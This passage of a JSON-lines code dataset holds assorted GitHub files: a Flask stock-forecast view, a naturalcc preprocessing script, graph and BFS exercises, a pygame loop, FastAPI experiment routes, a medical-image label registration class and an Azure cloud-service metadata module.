= round(((upper_bound - actual_forecast) + (actual_forecast - 
lower_bound)) / 2, 2)\r\n\r\n    summary = master_prophet.info[\"summary\"]\r\n    country = master_prophet.info[\"country\"]\r\n    sector = master_prophet.info[\"sector\"]\r\n    website = master_prophet.info[\"website\"]\r\n    min_date = master_prophet.info[\"min_date\"]\r\n    max_date = master_prophet.info[\"max_date\"]\r\n\r\n    forecast_date = master_prophet.forecast_date.date()\r\n\r\n    # Plotting the forecast using fbprophet's plot function\r\n    fig, ax = plt.subplots(figsize=(12, 8))\r\n    master_prophet.model.plot(forecast, ax=ax)\r\n    ax.set_title(\"Forecast for Stock Price\")\r\n    ax.set_xlabel(\"Date\")\r\n    ax.set_ylabel(\"Stock Price\")\r\n    ax.grid(True)\r\n\r\n    # Add markers for actual and forecasted values\r\n    ax.plot(historical_data.index[-365:], historical_data[\"Close\"].iloc[-365:], label='Actual')\r\n    ax.plot(forecast_date, actual_forecast, 'ro', markersize=8, alpha=0.5, label='Forecast')\r\n\r\n    # Add legend and grid lines\r\n    ax.legend()\r\n    ax.grid(True)\r\n\r\n    # Save the plot to a BytesIO object\r\n    buffer = BytesIO()\r\n    plt.savefig(buffer, format=\"png\", bbox_inches='tight', dpi=300)\r\n    buffer.seek(0)\r\n\r\n    # Encode the plot image to base64\r\n    plot_image = base64.b64encode(buffer.getvalue()).decode(\"utf-8\")\r\n\r\n    plt.close()\r\n\r\n    # Create response with the rendered template\r\n    response = make_response(render_template(\r\n        \"output.html\",\r\n        ticker=ticker.upper(),\r\n        sector=sector,\r\n        country=country,\r\n        website=website,\r\n        summary=summary,\r\n        min_date=min_date,\r\n        max_date=max_date,\r\n        forecast_date=forecast_date,\r\n        forecast=actual_forecast,\r\n        bound=bound,\r\n        plot_image=plot_image\r\n    ))\r\n\r\n    # Add necessary headers for the image\r\n    response.headers['Content-Type'] = 'text/html'\r\n    response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'\r\n    response.headers['Pragma'] = 'no-cache'\r\n    response.headers['Expires'] = '0'\r\n\r\n    return response\r\n","repo_name":"ShreyasNatu/BE_Final_Project","sub_path":"share_sensei/src/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40399497279","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom collections import Counter\n\nimport sentencepiece as spm\nimport torch\n\nfrom ncc_dataset.clcdsa import (\n    MODES,\n)\nfrom ncc_dataset.clcdsa.plbart import (\n    SPM_VOCAB_FILE,\n)\nfrom ncc import LOGGER\nfrom ncc.data.dictionary import (\n    Dictionary,\n)\nfrom ncc.tokenizers.tokenization import SPACE_SPLITTER\nfrom ncc.utils.file_ops import file_io\nfrom ncc.utils.file_ops import json_io\nfrom ncc.utils.file_ops.yaml_io import load_yaml\nfrom ncc.utils.path_manager import PathManager\nfrom ncc.data import indexed_dataset\n\n\ndef main(args):\n    LOGGER.info('mkdir {} for {} task'.format(args['preprocess']['destdir'], args['preprocess']['task']))\n    PathManager.mkdir(args['preprocess']['destdir'])\n    vocab = spm.SentencePieceProcessor()\n    vocab.load(SPM_VOCAB_FILE)\n\n    def save_dict():\n        src_file = os.path.join(os.path.dirname(SPM_VOCAB_FILE), 'dict.txt')\n        tgt_file = os.path.join(args['preprocess']['destdir'], 'dict.jsonl')\n        # Dictionary.text_to_jsonl(src_file, tgt_file)\n        vocab = Dictionary()\n        with file_io.open(src_file, 'r') as reader:\n            for line in reader:\n                token, num = line.strip().split()\n                vocab.add_symbol(token, eval(num))\n        vocab.save(tgt_file)\n        return vocab\n\n    dictionary = save_dict()\n\n    # 2. 
***************build dataset********************\n # dump into pkl file\n # transform a language's code into src format and tgt format simualtaneouly\n lang = args['preprocess']['lang']\n for mode in MODES:\n file = f\"{args['preprocess'][f'{mode}pref']}.code\"\n dst_file = os.path.join(args['preprocess']['destdir'], lang, f\"{mode}.code\")\n PathManager.mkdir(os.path.dirname(dst_file))\n dataset = indexed_dataset.make_builder(f\"{dst_file}_tokens.mmap\", impl='mmap', vocab_size=len(vocab))\n PathManager.mkdir(os.path.dirname(dst_file))\n with file_io.open(file, 'r') as reader:\n data = {'code': []}\n for line in reader:\n line = json_io.json_loads(line)\n code = SPACE_SPLITTER.sub(\" \", line)\n data['code'].append(code)\n code_tokens = vocab.encode(code, out_type=str)\n code_tokens = torch.IntTensor([dictionary.index(token) for token in code_tokens])\n # code_tokens = torch.IntTensor(vocab.encode_as_ids(code))\n dataset.add_item(code_tokens)\n dataset.finalize(f\"{dst_file}_tokens.idx\")\n # proj indices\n # cp id\n data['proj_indices'] = [1] * len(data['code'])\n file_io.open(f\"{dst_file}.pkl\", mode='wb', data=data)\n\n\ndef cli_main():\n import argparse\n parser = argparse.ArgumentParser(\n description=\"Downloading/Decompressing CodeSearchNet dataset(s) or Tree-Sitter Library(ies)\")\n parser.add_argument(\n \"--yaml_file\", \"-f\", type=str, help=\"load {yaml_file}.yml for train\",\n )\n args = parser.parse_args()\n yaml_file = os.path.join(os.path.dirname(__file__), f\"{args.yaml_file}.yml\")\n LOGGER.info('Load arguments in {}'.format(yaml_file))\n args = load_yaml(yaml_file)\n LOGGER.info(args)\n main(args)\n\n\nif __name__ == \"__main__\":\n cli_main()\n","repo_name":"CGCL-codes/naturalcc","sub_path":"ncc_dataset/codexglue/code_to_code/retrieval/plbart/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"53"} +{"seq_id":"5181699863","text":"# Works with undirected connected graphs\n\ntime = 1\n\n\ndef dfs_bridges(G, vertex, visited, parents, lows, times):\n global time\n visited[vertex] = True\n times[vertex] = time\n time += 1\n lows[vertex] = times[vertex]\n\n for neighbor in G[vertex]:\n if not visited[neighbor]:\n parents[neighbor] = vertex\n dfs_bridges(G, neighbor, visited, parents, lows, times)\n\n if lows[neighbor] < lows[vertex] and parents[vertex] != neighbor:\n lows[vertex] = lows[neighbor]\n\n return times, lows\n\n\ndef main():\n # G = [[1, 2, 3], [0, 2], [0, 1, 3], [0, 2], [5], [4], [7, 9], [6, 8], [7], [6, 10], [9, 11], [10]]\n # G = [[1], [2], [0, 3], [4], [5, 8], [6, 10], [3], [8], [10], [8], [7, 9]]\n G = [[1], [0, 2, 4], [1, 3], [2, 4], [1, 3, 5], [4, 6, 7], [5, 7], [5, 6]]\n visited = [False] * len(G)\n parents = [None] * len(G)\n lows = [None] * len(G)\n times = [None] * len(G)\n\n print(dfs_bridges(G, 2, visited, parents, lows, times))\n\n bridges = []\n for i in range(len(G)):\n tmp = []\n if times[i] == lows[i] and parents[i] is not None:\n tmp.append(i)\n tmp.append(parents[i])\n bridges.append(tmp)\n\n print(bridges)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"youngbucu/Studia","sub_path":"ASD/grafy/DFS/dfs_bridges_A.py","file_name":"dfs_bridges_A.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20181075403","text":"import sys\nimport pygame\n\npygame.init()\nwindow = pygame.display.set_mode((640, 
480))\nclock = pygame.time.Clock()\n\ndef keyboard_handler(events):\n    for event in events:\n        if event.type == pygame.KEYDOWN:\n            do_something()\n\nwhile True:\n    events = pygame.event.get()\n    for event in events:\n        if event.type == pygame.QUIT:\n            sys.exit()\n\n    keyboard_handler(events)\n\n    window.fill((0, 0, 0))\n    pygame.display.flip()\n    clock.tick(30)\n","repo_name":"bydariogamer/py101forpygamers","sub_path":"source/tipsandtricks/sourcecode/nestedloops_right.py","file_name":"nestedloops_right.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20451151301","text":"from fastapi import Request\nfrom fastapi.routing import APIRouter\nfrom loopquest import schema\nfrom datetime import datetime\nfrom .crud import *\nfrom shortuuid import ShortUUID\n\nALPHABET = \"0123456789abcdefghijklmnopqrstuvwxyz\"\ngen_short_uuid = lambda: ShortUUID(alphabet=ALPHABET).random(length=8)\n\napi_router = APIRouter(\n    prefix=\"/exp\",\n    tags=[\"Experiment\"],\n)\n\n\n@api_router.post(\"\", response_model=schema.Experiment)\nasync def create_experiment(request: Request, experiment: schema.ExperimentCreate):\n    while True:\n        try:\n            short_uuid = gen_short_uuid()\n            env = schema.Experiment(\n                **experiment.model_dump(),\n                id=short_uuid,\n                creation_time=datetime.now(),\n                update_time=datetime.now()\n            )\n            return await db_create_experiment(request.app.db, env)\n        except HTTPException as e:\n            if e.status_code == 409:\n                continue\n            else:\n                raise e\n\n\n@api_router.get(\"/all\", response_model=list[schema.Experiment])\nasync def get_all_experiments(request: Request):\n    exps = await db_get_all_experiments(request.app.db)\n    return exps\n\n\n@api_router.get(\"/{id}\", response_model=schema.Experiment)\nasync def read_experiment(request: Request, id: str):\n    env = await db_get_experiment(request.app.db, id)\n    return env\n\n\n@api_router.put(\"/{id}\", response_model=schema.Experiment)\nasync def update_experiment(\n    request: Request, id: str, experiment: schema.ExperimentUpdate\n):\n    env = await db_update_experiment(request.app.db, id, experiment)\n    return env\n\n\n@api_router.delete(\"/{id}\")\nasync def delete_experiment(request: Request, id: str):\n    await db_delete_experiment(request.app.db, id)\n    return {\"message\": \"Experiment deleted successfully\"}\n\n\n@api_router.get(\"/user/{user_id}/env/{env_id}\", response_model=list[schema.Experiment])\nasync def get_experiment_by_user_env(request: Request, user_id: str, env_id: str):\n    exps = await db_get_experiment_by_user_env(request.app.db, user_id, env_id)\n    return exps\n\n\n@api_router.get(\"/user/{user_id}\", response_model=list[schema.Experiment])\nasync def get_experiment_by_user(request: Request, user_id: str):\n    exps = await db_get_experiment_by_user(request.app.db, user_id)\n    return exps\n","repo_name":"LoopMind-AI/loopquest","sub_path":"backend/src/apps/experiment/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"1129325189","text":"n = int(input()) # read the number of friends\ndata = input()\nlist = data.split(' ') # split the friend IDs apart\nw = [] # stores the friend IDs\nv = [] # tracks whether each person was visited\nflag = 0 # number of small groups\nw = [int(x) for x in list] # convert the input strings to integers\nfor i in range(n):\n    v.append(0) # nobody visited yet, so set 0\n\nfor j in range(n):\n    if v[j] == 0: # start from someone unvisited; visited ones become 1\n        if w[j] == j: # being your own friend counts as one small group\n            flag += 1 # count that group right away\n            v[j] = 1 # mark as visited\n        else: # the friend is someone else\n            nextone = j # use nextone as a temporary cursor\n            while 
v[nextone] == 0: # keep following while unvisited\n                v[nextone] = 1 # mark the visited one with 1\n                nextone = w[nextone] # loop until the cycle closes into a small group\n            flag += 1 # one more small group found\n\nprint(flag) # print the number of small groups","repo_name":"jasontaichi/jasonpython","sub_path":"EX7.py","file_name":"EX7.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70361765289","text":"import unittest\nimport numpy as np\nfrom skimage import io\nimport SimpleITK as sitk\nfrom skimage import measure\nimport torch\n\n\ndef auto_change_dtype(arr):\n    # TODO: optimize performance\n    if arr.min() < 0:\n        return arr.astype('int16')\n    else:\n        return arr.astype('uint16')\n\n\nclass LabelRegister:\n    \"\"\"\n    Label registration: maps manually defined partitions onto already-segmented organs; the partitions are set via hand-drawn regions\n    \"\"\"\n\n    def __init__(self):\n        self._region_model = None\n\n    def bounding_rectangle(self, image):\n        \"\"\"\n        Compute the bounding rectangle (returns the centroid of the binarized label)\n        :param image:\n        :return:\n        \"\"\"\n        label_arr = image\n        label_arr[label_arr > 1] = 1\n        label_arr[label_arr < 1] = 0\n        label_arr.astype(np.uint8)\n        region_properties = measure.regionprops(label_arr)\n        # the boundary definition here seems a bit fuzzy\n        arr_centroid = region_properties[0].centroid\n        arr_centroid = [round(arr_centroid[0]), round(arr_centroid[1]), round(arr_centroid[2])]\n        return arr_centroid\n\n    def label_binary_array_resize_4d(self, labels, target_shape):\n        \"\"\"\n        Resize a binarized label; returns integers\n        Often called for label scaling, similar to nearest-neighbour interpolation, but it cannot handle labels with several distinct values; for multiple label values use image_array_resize_4d(imgs, target_shape, mode='nearest')\n        :param labels: (c,z,y,x) binarized array, 0-1\n        :param target_shape: (z,y,x)\n        :return: binarized array, (c,z,y,x)\n        \"\"\"\n        labels[labels > 1] = 1\n        # assert labels.max() <= 1 and labels.min() >= 0, 'label values other than 0 and 1 are not supported yet'\n        float_labels = self.image_array_resize_4d(labels, target_shape)\n        float_labels[float_labels > 0.5] = 1  # float_imgs += 0.49 # avoids large areas of the label going missing\n        int_imgs = float_labels.astype('uint8')\n        return int_imgs\n\n    def label_array_resize_3d(self, label_arr, target_shape):\n        \"\"\"\n        3-D label scaling; supports labels with multiple values\n        The idea is to split the 3-D label by value (np.unique(arr) shows which values an array holds) into a 4-D array, call label_binary_array_resize_4d, then merge the resulting 4-D array back into a 3-D array\n        :param label_arr: (z,y,x) 3-D array, integer\n        :param target_shape: (z,y,x)\n        :return: (z,y,x) 3-D array, dtype np.int16\n        \"\"\"\n        label_arr = np.array([label_arr])\n        res_arr = self.label_binary_array_resize_4d(label_arr, target_shape)[0]\n        return res_arr\n\n    def image_array_resize_4d(self, imgs, target_shape, mode='trilinear'):\n        \"\"\"\n        Resize DICOM or NIfTI images; note the result is float and must be converted to integers as needed\n        :param imgs: (c,z,y,x)\n        :param target_shape: (z,y,x)\n        :param mode: (string): algorithm used for upsampling:\n            'nearest' | 'linear' | 'bilinear' | 'trilinear' | 'area'. Note that using nearest directly can shift the labels\n        :return: float array, (c,z,y,x)\n        \"\"\"\n        imgs = imgs[np.newaxis].astype(np.float)\n        imgs = torch.from_numpy(imgs)\n        # print(imgs)\n        # https://www.cnblogs.com/wanghui-garcia/p/11399034.html\n        # an interpolating mode is required here, otherwise: ValueError: align_corners option can only be set with the interpolating modes: linear | bilinear | trilinear\n        imgs = torch.nn.functional.interpolate(imgs, size=target_shape, mode=mode)  # align_corners=True makes no real difference\n        float_imgs = imgs.numpy()[0]\n        # int_imgs = float_imgs.astype('uint8')\n        return float_imgs\n\n    def set_region_model(self, itk_image):\n        \"\"\"\n        Set the label of the annotated partitions; each region is represented by a different value\n        :param itk_image: a sitk.Image object\n        :return:\n        \"\"\"\n        self._region_model = itk_image\n\n    def set_model_directon(self, model_image, region_image):\n        \"\"\"\n        Get a model whose direction is consistent with the region image\n        :param itk_image:\n        :return:\n        \"\"\"\n        model_image = sitk.ReadImage(model_image)\n        itk_image = sitk.ReadImage(region_image)\n        # adjust the region_model direction\n        resampler = sitk.ResampleImageFilter()\n        
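# Resample the hand-drawn model onto the target grid so origin, spacing, size, and direction all match the region image.\n        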
resampler.SetOutputOrigin(itk_image.GetOrigin())\n        resampler.SetOutputSpacing(itk_image.GetSpacing())\n        resampler.SetSize(itk_image.GetSize())\n        resampler.SetOutputDirection(itk_image.GetDirection())\n        new_region_model = resampler.Execute(model_image)\n        return new_region_model\n\n    def set_model_shape(self, model_new_arr, region_arr):\n        \"\"\"\n        Resize the model array to the region's shape\n        :param model_new_arr:\n        :param region_arr:\n        :return:\n        \"\"\"\n        transform_arr = self.label_array_resize_3d(model_new_arr,\n                                                   (region_arr.shape[0], region_arr.shape[1], region_arr.shape[2]))\n        return transform_arr\n\n    def get_after_mapping_image(self, transform_arr, region_arr):\n        \"\"\"\n        Map the image's regions using the largest intersection\n        :param max_intersection_arr:\n        :param itk_image_arr:\n        :return:\n        \"\"\"\n        res_index_list = []\n        after_mapping_arr = np.zeros((region_arr.shape[0], region_arr.shape[1], region_arr.shape[2]))\n        for z in range(transform_arr.shape[0]):\n            for x in range(transform_arr.shape[2]):\n                for y in range(transform_arr.shape[1]):\n                    if transform_arr[z][y][x] == 1:\n                        res_index_list.append([z, y, x])\n        for i in res_index_list:\n            if region_arr[i[0]][i[1]][i[2]]:\n                after_mapping_arr[i[0]][i[1]][i[2]] = region_arr[i[0]][i[1]][i[2]]\n        itk_image = sitk.GetImageFromArray(region_arr)\n        image_obj = sitk.GetImageFromArray(after_mapping_arr)\n        image_obj.SetSpacing(itk_image.GetSpacing())\n        image_obj.SetOrigin(itk_image.GetOrigin())\n        image_obj.SetDirection(itk_image.GetDirection())\n        # sitk.WriteImage(image_obj, 'res.nii.gz')\n        return image_obj\n\n    def rigid_registration(self, itk_image):\n        \"\"\"\n        Rigid label registration: maps the rough organ onto the matching region of region_model\n        Step 1: align the direction of region_model with itk_image\n        resampler = sitk.ResampleImageFilter()\n        resampler.SetOutputDirection(itk_image.GetDirection())\n        new_region_model = resampler.Execute(self._region_model)\n        Step 2: scale and translate region_model so that the two bounding rectangles roughly coincide\n        for the bounding rectangle see batch_command\\djTubePositions.py lines 170-175\n        3-D image scaling calls smartimage.transforms.utils.label_array_resize_3d; that function still needs to be completed\n        Step 3: build a sitk.Image object from the adjusted region_model and return it\n        image_obj = sitk.GetImageFromArray(image_arr)\n        image_obj.SetSpacing(itk_image.GetSpacing())\n        image_obj.SetOrigin(itk_image.GetOrigin())\n        image_obj.SetDirection(itk_image.GetDirection())\n        :param itk_image: a sitk.Image object\n        :return: a sitk.Image object\n        \"\"\"\n        # adjust the model direction\n        new_model = self.set_model_directon(self._region_model, itk_image)\n        # convert the images to arrays\n        itk_image = sitk.ReadImage(itk_image)\n        itk = sitk.ReadImage(new_model)\n        model_arr = sitk.GetArrayFromImage(itk)\n        region_arr = sitk.GetArrayFromImage(itk_image)\n        # resize\n        transform_arr = self.set_model_shape(model_arr, region_arr)\n        # compute the bounding-rectangle centroids\n        transfrom_rectangle_centroid = self.bounding_rectangle(transform_arr)\n        region_rectangle_centroid = self.bounding_rectangle(region_arr)\n        # print(transfrom_rectangle_centroid, region_rectangle_centroid, transform_arr.shape, region_arr.shape)\n        # coordinate offsets between the two centroids\n        move_z_num = region_rectangle_centroid[0] - transfrom_rectangle_centroid[0]\n        move_y_num = region_rectangle_centroid[1] - transfrom_rectangle_centroid[1]\n        move_x_num = region_rectangle_centroid[2] - transfrom_rectangle_centroid[2]\n        tmp_z_arr = np.zeros((transform_arr.shape[0], transform_arr.shape[1], transform_arr.shape[2]))\n        # shift according to the coordinate offsets\n        if move_z_num > 0:\n            tmp_z_arr[region_rectangle_centroid[0]:, :, :] = transform_arr[transfrom_rectangle_centroid[0]: transfrom_rectangle_centroid[0] + region_arr.shape[0] - region_rectangle_centroid[0], :, :]\n            tmp_z_arr[region_rectangle_centroid[0] - transfrom_rectangle_centroid[0]-1:region_rectangle_centroid[0], :, :] = 
transform_arr[:transfrom_rectangle_centroid[0]+1, :, :]\n elif move_z_num == 0:\n tmp_z_arr = transform_arr\n else:\n tmp_z_arr[region_rectangle_centroid[0]:region_rectangle_centroid[0] + (transform_arr.shape[0] - transfrom_rectangle_centroid[0]), :, :] = transform_arr[transfrom_rectangle_centroid[0]:, :, :]\n tmp_z_arr[:region_rectangle_centroid[0]+1, :, :] = transform_arr[transfrom_rectangle_centroid[0] - region_rectangle_centroid[0]-1: transfrom_rectangle_centroid[0], :, :]\n # print(tmp_z_arr)\n tmp_y_arr = np.zeros((transform_arr.shape[0], transform_arr.shape[1], transform_arr.shape[2]))\n if move_y_num > 0:\n tmp_y_arr[:, region_rectangle_centroid[1]:, :] = tmp_z_arr[:, transfrom_rectangle_centroid[1]: transfrom_rectangle_centroid[1] + region_arr.shape[1] - region_rectangle_centroid[1], :]\n tmp_y_arr[:, region_rectangle_centroid[1] - transfrom_rectangle_centroid[1] - 1:region_rectangle_centroid[1], :] = tmp_z_arr[:, :transfrom_rectangle_centroid[1] +1, :]\n elif move_y_num == 0:\n tmp_y_arr = tmp_z_arr\n else:\n tmp_y_arr[:, region_rectangle_centroid[1]:region_rectangle_centroid[1] + (transform_arr.shape[1] - transfrom_rectangle_centroid[1]), :] = tmp_z_arr[:, transfrom_rectangle_centroid[1]:, :]\n tmp_y_arr[:, :region_rectangle_centroid[1]+1, :] = tmp_z_arr[:, transfrom_rectangle_centroid[1] - region_rectangle_centroid[1]-1: transfrom_rectangle_centroid[1], :]\n # print(d)\n tmp_x_arr = np.zeros((transform_arr.shape[0], transform_arr.shape[1], transform_arr.shape[2]))\n if move_x_num > 0:\n tmp_x_arr[:, :, region_rectangle_centroid[2]:] = tmp_y_arr[:, :, transfrom_rectangle_centroid[2]: transfrom_rectangle_centroid[2] + region_arr.shape[2] - region_rectangle_centroid[2]]\n tmp_x_arr[:, :,\n region_rectangle_centroid[2] - transfrom_rectangle_centroid[2]-1:region_rectangle_centroid[2]] = tmp_y_arr[:, :, : transfrom_rectangle_centroid[2]+1]\n elif move_x_num == 0:\n tmp_x_arr = tmp_y_arr\n else:\n tmp_x_arr[:, :, region_rectangle_centroid[2]:region_rectangle_centroid[2] + (transform_arr.shape[2] - transfrom_rectangle_centroid[2])] = tmp_y_arr[:, :, transfrom_rectangle_centroid[2]:]\n tmp_x_arr[:, :, :region_rectangle_centroid[2]+1] = tmp_y_arr[:, :, transfrom_rectangle_centroid[2]-region_rectangle_centroid[2]-1: transfrom_rectangle_centroid[2]]\n # 获取映射后区域\n mapping_image = self.get_after_mapping_image(tmp_x_arr, region_arr)\n return mapping_image\n\n\nif __name__ == '__main__':\n # 创建对象\n model_image = 'labels__alone.nii.gz'\n itk_image = 'plabels_1__images_1.nii.gz'\n labelrigister = LabelRegister()\n labelrigister.set_region_model(model_image)\n labelrigister.rigid_registration(itk_image)\n","repo_name":"lishijia2740/batch_processing_work","sub_path":"model_region/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33007105630","text":"import os\nfrom spaceone.inventory.libs.utils import *\nfrom spaceone.inventory.libs.schema.metadata.dynamic_widget import CardWidget, ChartWidget\nfrom spaceone.inventory.libs.schema.metadata.dynamic_field import TextDyField, SearchField, DateTimeDyField, ListDyField, \\\n EnumDyField\nfrom spaceone.inventory.libs.schema.cloud_service_type import CloudServiceTypeResource, CloudServiceTypeResponse, \\\n CloudServiceTypeMeta\n\ncurrent_dir = os.path.abspath(os.path.dirname(__file__))\n\nvirtualnetwork_count_per_location_conf = os.path.join(current_dir, 
'widget/virtualnetwork_count_per_location.yaml')\nvirtualnetwork_count_per_subscription_conf = os.path.join(current_dir, 'widget/virtualnetwork_count_per_subscription.yaml')\nvirtualnetwork_subnet_count_per_location_conf = os.path.join(current_dir, 'widget/virtualnetwork_subnet_count_per_location.yaml')\nvirtualnetwork_subnet_count_per_subscription_conf = os.path.join(current_dir, 'widget/virtualnetwork_subnet_count_per_subscription.yaml')\n\n\ncst_virtual_network = CloudServiceTypeResource()\ncst_virtual_network.name = 'VirtualNetwork'\ncst_virtual_network.group = 'Network'\ncst_virtual_network.service_code = 'Microsoft.Network/virtualNetworks'\ncst_virtual_network.labels = ['Network']\ncst_virtual_network.is_major = True\ncst_virtual_network.is_primary = True\ncst_virtual_network.tags = {\n 'spaceone:icon': 'https://spaceone-custom-assets.s3.ap-northeast-2.amazonaws.com/console-assets/icons/cloud-services/azure/azure-virtual-networks.svg',\n}\n\ncst_virtual_network._metadata = CloudServiceTypeMeta.set_meta(\n fields=[\n TextDyField.data_source('Name', 'name'),\n TextDyField.data_source('Resource Group', 'data.resource_group'),\n TextDyField.data_source('Location', 'data.location'),\n TextDyField.data_source('Subscription', 'data.subscription_name'),\n\n # is_optional fields - Default\n TextDyField.data_source('Resource ID', 'data.id', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Subscription ID', 'account', options={\n 'is_optional': True\n }),\n ListDyField.data_source('DNS servers', 'data.dhcp_options.dns_servers', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Resource GUID', 'data.resource_guid', options={\n 'is_optional': True\n }),\n ListDyField.data_source('Address Space', 'data.address_space.address_prefixes', options={\n 'is_optional': True\n }),\n\n # is_optional fields - Connected Devices\n TextDyField.data_source('Connected Device', 'data.connected_devices.device', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Connected Device Type', 'data.connected_devices.type', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Connected Subnet', 'data.connected_devices.name', options={\n 'is_optional': True\n }),\n\n # is_optional fields -Subnets\n TextDyField.data_source('Subnet Name', 'data.subnets.name', options={\n 'is_optional': True\n }),\n TextDyField.data_source('IP Address Prefix', 'data.subnets.address_prefix', options={\n 'is_optional': True\n }),\n ListDyField.data_source('IP Address Prefixes', 'data.subnets.address_prefixes', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Delegated To', 'data.subnets.delegations.name', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Security Group', 'data.subnets.network_security_group.name', options={\n 'is_optional': True\n }),\n\n # is optional fields - Firewall\n TextDyField.data_source('Firewall Name', 'data.azure_firewall.name', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Firewall IP Address', 'data.azure_firewall.ip_configurations.private_ip_address', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Firewall Subnet', 'data.azure_firewall.subnet', options={\n 'is_optional': True\n }),\n\n # is_optional fields - Peerings\n TextDyField.data_source('Peering Name', 'data.virtual_network_peerings.name', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Peer', 'data.virtual_network_peerings.remote_virtual_network.id', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Peer 
Gateway Transit', 'data.virtual_network_peerings.allow_gateway_transit', options={\n 'is_optional': True\n }),\n\n # is_optional fields - Service Endpoints\n TextDyField.data_source('Service', 'data.service_endpoints.service', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Subnet', 'data.service_endpoints.subnet', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Locations', 'data.service_endpoints.locations', options={\n 'is_optional': True\n }),\n\n # is_optional fields - Private Endpoints\n TextDyField.data_source('Private Endpoint', 'data.private_endpoints.name', options={\n 'is_optional': True\n }),\n TextDyField.data_source('Private Endpoint Subnet', 'data.private_endpoints.subnet', options={\n 'is_optional': True\n })\n ],\n search=[\n SearchField.set(name='ID', key='data.id', data_type='string'),\n SearchField.set(name='Name', key='name', data_type='string'),\n SearchField.set(name='Subscription ID', key='account', data_type='string'),\n SearchField.set(name='Subscription Name', key='data.subscription_name', data_type='string'),\n SearchField.set(name='Resource Group', key='data.resource_group', data_type='string'),\n SearchField.set(name='Location', key='data.location', data_type='string'),\n ],\n widget=[\n ChartWidget.set(**get_data_from_yaml(virtualnetwork_count_per_subscription_conf)),\n ChartWidget.set(**get_data_from_yaml(virtualnetwork_count_per_location_conf)),\n ChartWidget.set(**get_data_from_yaml(virtualnetwork_subnet_count_per_subscription_conf)),\n ChartWidget.set(**get_data_from_yaml(virtualnetwork_subnet_count_per_location_conf))\n ]\n)\n\n\nCLOUD_SERVICE_TYPES = [\n CloudServiceTypeResponse({'resource': cst_virtual_network}),\n]\n","repo_name":"jean1042/plugin-azure-cloud-services","sub_path":"src/spaceone/inventory/model/virtualnetwork/cloud_service_type.py","file_name":"cloud_service_type.py","file_ext":"py","file_size_in_byte":6463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71888418409","text":"# Baekjoon 17086: Baby Shark 2\n# For every cell, compute the distance to the nearest shark via BFS; print the maximum.\n\nfrom collections import deque\n\nn, m = map(int,input().split())\narr = [list(map(int,input().split())) for _ in range(n)]\n\nbaby_shark = list()\nfor i in range(n):\n for j in range(m):\n if arr[i][j] == 1:\n baby_shark.append((i,j))\n arr[i][j] = -1\n\ndr = [1,1,1,0,-1,-1,-1,0]\ndc = [1,0,-1,-1,-1,0,1,1]\n\nfor r, c in baby_shark:\n q = deque()\n q.append((r,c,0))\n while q:\n cr, cc, cnt = q.popleft()\n for d in range(8):\n nr, nc = cr+dr[d], cc+dc[d]\n if 0 <= nr < n and 0 <= nc < m and (arr[nr][nc] > cnt+1 or not arr[nr][nc]):\n q.append((nr,nc,cnt+1))\n arr[nr][nc] = cnt + 1\n\nanswer = 0\nfor i in range(n):\n for j in range(m):\n if arr[i][j] != -1:\n answer = max(answer, arr[i][j])\n\nprint(answer)\n","repo_name":"do0134/solostudy","sub_path":"algorithm/10월/1012/1sol.py","file_name":"1sol.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7054225039","text":"# Problem No.: 2562\n# Solver: Jinmin Goh\n# Date: 20191125\n# URL: https://www.acmicpc.net/problem/2562\n\nimport sys\n\nnum = []\nfor i in range(9):\n num.append(int(input()))\n\nprint(max(num))\nprint(num.index(max(num)) + 1)","repo_name":"Jinmin-Goh/BOJ_PS","sub_path":"Solved/02562/02562.py","file_name":"02562.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
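A note on the Baekjoon 17086 record above: it launches a separate BFS from every shark and relies on the arr[nr][nc] > cnt+1 check to re-relax cells, so grids with many sharks do repeated work. The same distances can be computed in one pass with a multi-source BFS that seeds a single queue with every shark cell at distance 0; each cell is then settled exactly once, for O(n*m) total work. A minimal sketch of that variant (the helper name max_safety_distance is illustrative, not from the repository above):

from collections import deque

def max_safety_distance(grid):
    # grid[r][c] == 1 marks a shark; a cell's safety distance is its BFS
    # distance over 8-neighbour moves to the nearest shark.
    n, m = len(grid), len(grid[0])
    dist = [[-1] * m for _ in range(n)]
    q = deque()
    # Multi-source seeding: every shark starts in the queue at distance 0.
    for r in range(n):
        for c in range(m):
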